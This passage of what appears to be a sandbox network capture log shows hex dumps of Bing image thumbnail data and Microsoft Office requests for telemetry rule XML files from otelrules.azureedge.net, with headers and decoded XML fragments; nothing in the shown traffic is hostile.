32 ae e5 51 ee 7b 55 86 4b df 31 Data Ascii: tU&!ta"fZuY6ty;J;7K&w\|HUO+[Vb='`ZEZEVF?{X7c+\|7.xRX[PYDpGMV283egTxMBcMuZ<vo[Ao5EI[wU}kY^mwuts69^IDyd]2Q{UK1
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 9d 70 b7 fe 72 e2 78 e4 1d 7e e9 5f ea 69 d6 12 7f a3 a9 8e 0f 2e 36 e5 99 9b e6 6f ca ae c6 e5 f9 0b c5 53 b5 ac 89 8a 6d dd 95 24 9a 75 56 df 13 31 5e 17 6f a5 36 d4 93 f3 1d db bf ba df 2d 59 65 f3 37 03 59 73 da de 8b a9 1f ed 3b ad db 94 da b8 75 f6 3d 8d 71 d6 a0 dc af 17 a9 d9 0a bc ab 55 a1 72 76 02 16 df ff 00 01 ff 00 67 df 35 14 aa 8f 1f 09 b8 37 de ef cd 31 63 73 1a c4 6e 55 7f e7 a2 b2 fc d4 f4 b7 0a cb fe 92 df f0 1c 57 27 b3 92 76 be a6 d7 4d 5f a1 56 40 eb 23 20 e9 f9 ee 1f 4a bf a7 c5 1c 31 f9 b2 aa a9 5f ef 7f 3f a5 50 bc 8a 38 2f 12 79 6f a7 90 af dd 4e 36 d3 d6 e5 ae 23 6f ba c5 78 56 65 c6 da b9 46 4a d6 26 0d 6e 5e b9 6b 6f 39 67 92 75 62 bf 3a b3 36 dd bf 4f 6a ad 7d a9 c3 e7 45 96 58 95 f2 37 b3 77 f6 15 13 da 5a df 5b b4 77 11 ee Data Ascii: prx~_i.6oSm$uV1^o6-Ye7Ys;u=qUrvg571csnUW'vM_V@# J1_?P8/yoN6#oxVeFJ&n^ko9gub:6Oj}EX7wZ[w
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 7d e0 df dd f9 aa b3 d8 c8 3e e6 dc 7f b4 d8 fe 54 42 ad 69 e8 f4 0e 5a 31 7b 5c b5 75 e2 7b 58 f8 91 da 36 7f bc ad 9f e7 55 57 52 8e e2 4f 39 2c 5a 63 d1 55 73 db e9 cd 41 26 93 64 d2 2f 9b 2a ab 48 df 33 6d dd fc ea 46 8d 2d db 16 f2 6d 2b 90 ad fd ef c2 b4 9d 4e 54 ad 26 ff 00 21 c6 0a 4d fb b6 2b 4d 3d 95 cc cf 0c fa 44 6c 53 86 46 51 f5 c5 5b 9a da db ec 6a 56 c6 da 09 17 fe 79 ff 00 f5 aa b5 ad a0 56 69 46 e6 96 56 cb 33 7c c5 8d 5c ba c5 a4 21 b5 06 d8 ac d8 55 fe f1 f7 c5 63 52 7a a8 c5 9b aa 71 51 bd 8a f6 0b 78 f7 49 95 b6 8a dd 73 b9 99 72 5b db 34 ba 85 f5 fd bc 2d 15 a6 e6 32 30 3e 5c 6d b7 76 7d 71 48 f7 71 b4 6c 04 b1 a4 6b f7 56 a1 8f 50 d3 ed 24 5b 89 66 5c 7f 0a af 3b 8d 38 a9 73 5d 44 b6 92 8d db 33 6f a0 d4 6d da 69 e7 f9 a3 93 05 d3 Data Ascii: }>TBiZ1{\u{X6UWRO9,ZcUsA&d/*H3mF-m+NT&!M+M=DlSFQ[jVyViFV3\|\!UcRzqQxIsr[4-20>\mv}qHqlkVP$[f\;8s]D3omi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49726	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	346	OUT	GET /th?id=OADD2.10239399109665_1344PV668L57B53FJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:19 UTC	861	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 685668 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 0D4D6917ED83447C84BF3FFA0EB95B52 Ref B: EWR30EDGE1018 Ref C: 2024-12-08T12:31:19Z Date: Sun, 08 Dec 2024 12:31:18 GMT Connection: close
2024-12-08 12:31:19 UTC	3517	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a 1c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 36 20 30 39 3a 33 38 3a 34 31 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:06 09:38:418
2024-12-08 12:31:19 UTC	8192	IN	Data Raw: 86 26 12 14 37 da ee 5f cb fa ad cc 92 e2 da 3c 3f a3 fe 33 6e ee a9 73 31 ed 63 71 fe ca 0b 40 af 2e b1 f4 5b 63 22 c6 d7 60 f4 d9 bb 6b 6c 7d 76 fa 5f a3 a5 55 e9 f5 f5 16 55 5f 56 a7 65 98 ce 30 eb 36 b5 db f8 df b6 97 0d af 73 3f d2 7f a4 56 1b 46 6d 95 3b 1f 21 ef 61 6e c7 56 2c 73 de d7 87 0f 73 d8 ca c5 94 57 4b 7f c1 b2 b7 d9 75 b6 ab 7d 37 a7 75 06 b2 b6 92 6a 63 5d bb 6d c4 3c 10 e3 ba c0 1b b4 ec b1 de df d1 fe 9d 4c 44 b7 37 7d 35 f5 7f 5c 7c bc 71 92 28 ca 62 52 26 5a 7d 92 ff 00 9a b6 3d 98 b6 d9 66 6b da 19 90 f8 35 5b 63 65 95 80 0b 3d ec 63 b7 55 63 5a ef d1 fb 59 fd 8f 7a b7 8f d2 ad b9 8e c9 3e 90 a6 dd a6 6b 04 35 e0 3b 73 ed d8 e3 4b f1 ec b7 f3 df 53 9e ac d8 dc 3c 5d d6 65 01 75 a0 87 43 e0 80 ef bb db ff 00 4e c5 89 d5 be b2 59 6c Data Ascii: &7_<?3ns1cq@.[c"`kl}v_UU_Ve06s?VFm;!anV,ssWKu}7ujc]m<LD7}5\\|q(bR&Z}=fk5[ce=cUcZYz>k5;sKS<]euCNYl
2024-12-08 12:31:19 UTC	4144	IN	Data Raw: a6 8f fb bf f9 69 73 63 2e ff 00 fc 72 ba 0d 37 c6 3e 1e d4 2e e3 b5 83 52 f2 e7 93 fe 59 cb 13 a5 78 a4 fe 62 7c 90 4d fe af fd 5d 1e 6e ff 00 31 13 ce 93 cb a9 4a 6b a9 af b4 85 ed 6b 7c cf a1 77 7f 1f fc b3 a4 f3 6b c3 2c 75 ed 4b 4f f9 ec a6 9a df fe b9 4b 5a 11 f8 ff 00 c4 31 43 2e fb cf 33 cc ff 00 57 24 b1 25 5c 66 db d5 58 89 54 8a 76 e6 3d 8f cd a5 dd 5e 45 75 e3 6f 12 cb fe a3 58 86 df cc 8f fe 59 5a 26 c8 ea 0f f8 4e 3c 4b 71 37 91 fd a5 34 72 7f d3 2b 44 fd e7 fe 3b 47 b4 8b 7b 5c 13 4a da d8 f6 3f 36 9b e6 d7 92 c1 e3 6f 12 f9 31 bf f6 97 fe 42 4a d4 b1 f8 95 3c 53 7f c4 d2 ce 19 23 ff 00 a7 6f 91 ff 00 c2 94 6b 2b ec ca 95 92 d2 68 f4 6f 36 8f 36 b8 6f f8 58 90 3f fa 8d 06 ef fe da ca 89 50 dd 7c 43 91 21 fd c6 8f 0c 7f f5 d6 ef ff 00 b1 a7 Data Ascii: isc.r7>.RYxb\|M]n1Jkk\|wk,uKOKZ1C.3W$%\fXTv=^EuoXYZ&N<Kq74r+D;G{\J?6o1BJ<S#ok+ho66oX?P\|C!
2024-12-08 12:31:19 UTC	8192	IN	Data Raw: 80 7a a2 6b de 08 b7 bb fb 16 a3 0d a5 c4 92 7f cb 4f b9 0c 7f f0 34 a7 cd 63 e1 4d 4f cc 74 9a 1b 7f 2e 5f 2e 4f f8 98 3b fc df f7 cd 78 b4 f0 5a 5a 5d ff 00 a1 43 fb bf 2e 9b 3c b3 bc 3b 3c ef f5 75 7f d9 b2 53 e6 a7 51 eb dc 98 e7 91 69 a9 d2 4f f2 3d 4b 58 9f c2 f6 ff 00 22 78 f3 ec 57 51 ff 00 ab 8e 28 b7 ff 00 e3 d4 78 73 e2 5f f6 57 fa 2b ea 53 6a 31 ff 00 d7 2d f5 e5 f0 2c 92 cd 1c 1f f2 d2 4a 74 f6 73 a5 df 91 ff 00 3c ff 00 d6 57 5d 3a 71 a6 b9 1c 9d ed 73 93 11 8f 75 1b 94 69 a5 73 de 23 f8 c5 e0 ff 00 b9 3f f6 b5 bc 9f f5 e9 bf ff 00 41 aa 1a c7 c7 0f 0f 5b c3 27 f6 5e 8f ab 5e 4f ff 00 2c fc dd 96 f0 ff 00 e8 5b ff 00 f1 da f0 fb ab 6b bb 49 a3 4f 26 68 fc cf f5 71 53 3c a9 3c ed ef e4 c7 25 77 53 a9 68 fc 57 3c c7 07 39 f6 3d 27 5c f8 e5 e2 Data Ascii: zkO4cMOt._.O;xZZ]C.<;<uSQiO=KX"xWQ(xs_W+Sj1-,Jts<W]:qsuis#?A['^^O,[kIO&hqS<<%wShW<9='\
2024-12-08 12:31:19 UTC	8192	IN	Data Raw: 9a 5f f6 3f de fe f5 5c 54 61 4d 49 2e 6e 65 6d 1e c1 2b ce 76 7a 72 be db 8f d2 be c8 f0 c7 e4 7e ee 7f 9f f7 72 ca 8f f6 77 fe e3 ff 00 f6 34 78 8e 59 34 fd 26 e7 51 ba 87 ed 10 7f cf b5 b7 df f9 be 5f bb 59 7a 95 8e 9b ac 6a 12 3d ef da e4 8f e4 ff 00 49 8a 2f 93 62 fd ef b9 c7 35 6b 43 68 34 7f 2d 1e 19 ad fe d1 bf ec 52 7f b1 ff 00 02 ac 65 46 09 a9 ad 65 db fe 0f fc 03 68 d4 7c d6 6a cb b9 06 86 b3 e9 f7 72 59 5d 6b 17 76 f6 bf 24 96 d2 4b 2f cf 1a 32 7f ab f9 ab 5a c7 53 92 59 a4 49 ff 00 e5 9c 7f bc 92 2f fd 0e 48 e9 ba ac f3 cb 0d f5 ae a3 67 34 90 79 7f f3 c9 3e e7 fb 95 87 a3 4f a9 79 32 42 fa c6 9f a8 da c7 fe b2 28 b7 f9 d6 e9 f7 7f ef 9f 5a a9 43 eb 71 95 49 a4 9f f5 ae 88 4a 4a 93 50 b3 77 37 ad 5b 52 9b 43 b9 4d 5f fb 3e 39 23 91 fc b8 ec Data Ascii: _?\TaMI.nem+vzr~rw4xY4&Q_Yzj=I/b5kCh4-ReFeh\|jrY]kv$K/2ZSYI/Hg4y>Oy2B(ZCqIJJPw7[RCM_>9#
2024-12-08 12:31:19 UTC	8192	IN	Data Raw: 35 25 63 aa 35 21 ed 1c 2f a9 d1 6b 1e 5f 93 fe 95 a6 fe ef cc ff 00 96 5f 7e 3f f7 7f d9 a8 27 6b 0b bb 49 34 e4 f2 63 92 4f f5 72 7d ca a1 a6 de 49 f6 bd 97 56 7f 68 8e 3f f5 7f df d9 fe fd 6e 69 50 78 7a 5d 5a da f6 eb fb 42 de 38 e4 fd e5 b7 df 7f f8 03 7d da e7 58 79 c1 6a f6 d7 46 74 46 8b 92 4e e6 45 ae 95 a9 5c 43 e4 41 34 37 1e 5f fd 35 4d f5 3d af 87 2d 26 d7 23 7b eb 38 6e 3f e7 a4 72 fc 8f f2 d7 aa fd 9b e1 9f d9 2e 27 b5 d7 75 68 e7 92 3f f4 79 3c ad 9f bd ff 00 80 c7 f2 b7 d6 b8 e8 ec f4 9b 7f 0f 49 7b aa 4d a8 5b df 5b c9 e6 79 72 fc e9 ff 00 7d 55 43 30 b4 5d db 57 f4 fd 19 d1 1a 31 a3 51 4e 2e e9 6b af 91 24 7e 1a b1 d5 6d 2d ad 53 4d 86 dd 23 91 fe c5 2c 5b e1 9a 0f fc 77 63 57 35 ac 78 2a 7f 3a e5 24 87 ed 11 c7 fb cf 33 ff 00 d9 ae cb Data Ascii: 5%c5!/k__~?'kI4cOr}IVh?niPxz]ZB8}XyjFtFNE\CA47_5M=-&#{8n?r.'uh?y<I{M[[yr}UC0]W1QN.k$~m-SM#,[wcW5x*:$3
2024-12-08 12:31:19 UTC	8192	IN	Data Raw: ce 92 0f 93 f7 9e 57 fe 85 5b d3 ea 16 9a af 96 fe 4c 52 49 1f fa cf dd 55 56 c1 c2 9d 78 d4 50 bc 1f 53 2a 78 e8 4e 9b a7 cd 69 2d 0e 67 4d d4 ee f4 fd 5a e6 7f 27 ed 11 c9 fb cf 33 ca f9 f7 d7 47 a6 ea b6 1a 85 a4 9a 8d ad 9c 56 f7 d6 ff 00 eb 25 fe 3d 9f c4 ad fd ea 2d 74 f8 d3 56 fb 6c 16 7e 5c 7f f4 ca 6f 92 ba 3d 0f fd 36 ef 62 43 ff 00 4c e4 b9 97 fe 59 ff 00 b4 b5 cb 9a 63 30 f0 f7 f9 7d eb 6b ad be f3 7c 32 9d 9e ba 5f b1 8d a6 f8 7a ee 28 6d 92 7d 62 6b 78 e4 ff 00 8f 6f f8 15 6a 5d 78 43 ed 1a 7c 70 3e b1 77 e6 5b dc f9 9f 69 8a 24 fb 9f c5 53 a4 5a f7 9d 73 e7 c3 e5 c1 1c 7f bb f2 a5 4f de 7f b5 56 b4 db e8 12 ee 38 3f 75 fb cf fa 6b bd 37 ff 00 c0 eb c1 c4 66 58 c7 2e 7a 73 5a 6b a5 8d d5 18 45 72 f9 58 ab 06 8d f6 2f b0 c1 3c d0 c9 6b 6f 27 Data Ascii: W[LRIUVxPS*xNi-gMZ'3GV%=-tVl~\o=6bCLYc0}k\|2_z(m}bkxoj]xC\|p>w[i$SZsOV8?uk7fX.zsZkErX/<ko'
2024-12-08 12:31:20 UTC	8192	IN	Data Raw: 3c b9 25 de fe 66 ef f6 eb a7 87 69 60 a1 5a 9b c3 c6 51 9a 8d da 97 9e f6 77 77 be e9 06 2a a4 aa 52 7c df 0d ec 61 e9 56 d2 69 53 49 74 f3 4d 24 f2 7f ab fb 4c 5f 24 7f ee d5 af 15 41 3d 97 ef ee bc 9f de 47 e6 49 1c 71 7c f1 ff 00 c0 5a bb 0d 37 c2 fa 4e 95 a4 db 6b d3 cd ab 49 3c 7f e9 11 c7 73 b1 ed a4 75 a9 2e 9e 7f 19 e9 36 de 21 f1 0e 9b 77 e6 7c f6 f1 dc c5 f7 ee 11 7e e7 ee ff 00 bb 5e d4 b3 ea 4e ba a9 6f 71 3e 59 37 a3 bf 45 15 d7 ae b7 39 16 1d 46 9b 57 d7 b1 c9 f8 67 5c f1 be a7 ab 79 1a 24 37 77 10 47 b2 4f b3 7d c4 d9 5e 8d e2 0b 9b 8f 0f c3 1e af 7d f6 48 ff 00 78 91 dc c9 17 cf 35 be ef f6 2b 8d d6 3f b1 5b 43 92 d7 4e bc bb b7 d6 2d e4 ff 00 59 2e ff 00 f4 84 5f f9 65 fe d3 53 34 af 10 f8 c3 ce 8e c6 08 7e db a9 47 1f fa b8 a2 df f7 7f Data Ascii: <%fi`ZQww*R\|aViSItM$L_$A=GIq\|Z7NkI<su.6!w\|~^Noq>Y7E9FWg\y$7wGO}^}Hx5+?[CN-Y._eS4~G
2024-12-08 12:31:20 UTC	8192	IN	Data Raw: ce c7 50 d2 ff 00 d1 e7 92 37 b7 ff 00 49 95 26 49 22 ff 00 6b fb 95 f3 98 1c 0b a4 a9 62 a9 a6 e4 ee b5 d2 ce da eb af e4 74 d6 c6 2a 69 c5 cb 4f 22 bf c5 88 ae 2f 6d 34 dd 5f fb 4a 18 ee a3 df 07 fd 7c 37 de ae 4f 47 9e 7b df 10 c7 75 e7 79 72 47 ff 00 2c e2 ff 00 96 92 ff 00 7a ba cd 47 5e d6 9e 68 e7 d4 6c f4 fb 89 e3 ff 00 8f 69 22 8b fd 5d 73 5b a4 7d 27 c9 4f b2 59 49 1d cf da 23 93 ca 4d fb db ef 6e 65 af b0 c9 e9 d5 a7 80 fa b4 a2 ba ab ad 6c 9b bf e0 79 55 a4 a7 53 9a 06 be 87 a8 47 ff 00 09 bd f5 eb cd 0e c8 f6 47 1f fc 0b ef 33 55 5d 56 e6 ef 53 d7 2d 9e d6 69 ae 24 f3 1e df ec d2 ff 00 e8 55 97 6b aa cf a5 6b 91 eb 7a 75 9c d1 fe f3 cb 93 f8 d2 49 7f bc bb eb a0 b5 d5 ee ec 66 8f c4 af ac 43 e7 c9 27 99 7b 1d b5 a7 ef a3 ff 00 e2 b3 45 4c 0c Data Ascii: P7I&I"kbt*iO"/m4_J\|7OG{uyrG,zG^hli"]s[}'OYI#MnelyUSGG3U]VS-i$UkkzuIfC'{EL
2024-12-08 12:31:20 UTC	8192	IN	Data Raw: b7 96 36 ba 77 da e4 fb 14 6f e6 79 bf 3f 99 b7 fd ff 00 bb 5b 9f 11 ac ff 00 e1 20 d0 ec 5e ca 5f de 7d b7 cc 8f f7 a9 fb 87 ff 00 7b fd ea e0 ac b1 58 2c 72 c2 e2 27 ee 3d 9b d7 95 6b 6f 5f 99 d1 19 42 a4 5c ed ef 79 19 76 b3 eb 5f da d6 c9 fd a5 69 24 77 12 79 72 47 2c 5f b9 ab 5e 24 b1 d7 9a f2 3b a8 74 db 49 12 38 ff 00 7b 24 72 ff 00 ac ff 00 69 59 6b 2f c1 7a e6 b4 9a 8f d8 a4 9b ed 90 69 d2 3c 7f 69 8b ee 48 ff 00 c6 bb 5a 9d 1c ff 00 d8 ff 00 69 d2 e3 87 ed 16 37 b2 3d dc 72 5b 7e e5 36 ef fb 8d b9 ab d6 8e 23 1b 47 13 c9 46 4a c9 2d 17 55 df a5 b4 e8 ce 88 36 e1 a7 53 53 47 be b0 bb d0 e4 7b 5f ed 08 f5 2b 78 ff 00 79 e6 ca ee f2 7f bd ba a2 ba b6 d3 5f 4f 93 54 82 69 ad fe cf fb c9 2c bc af 92 4f f6 a3 6a c6 d7 2f 2e ed fc 4f 6d 05 ac 33 79 1e Data Ascii: 6woy?[ ^_}{X,r'=ko_B\yv_i$wyrG,_^$;tI8{$riYk/zi<iHZi7=r[~6#GFJ-U6SSG{_+xy_OTi,Oj/.Om3y

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	49731	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:19 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 3fcd35f4-e01e-0052-4b02-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123119Z-r1cf579d7789trgthC1EWRkkfc000000062g000000001rbd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:19 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	49732	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:19 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c11b12be-901e-0048-4704-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123119Z-r1cf579d778w59f9hC1EWRze6w00000005gg000000005k1c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:19 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	49733	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:19 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 2b116ba0-201e-0051-0503-487340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123119Z-r1cf579d7788pwqzhC1EWRrpd800000005k00000000045nw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:19 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.6	49734	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:19 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: b9950e54-401e-0015-4806-480e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123119Z-r1cf579d778lntp7hC1EWR9gg400000004r00000000050zn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:19 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.6	49735	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
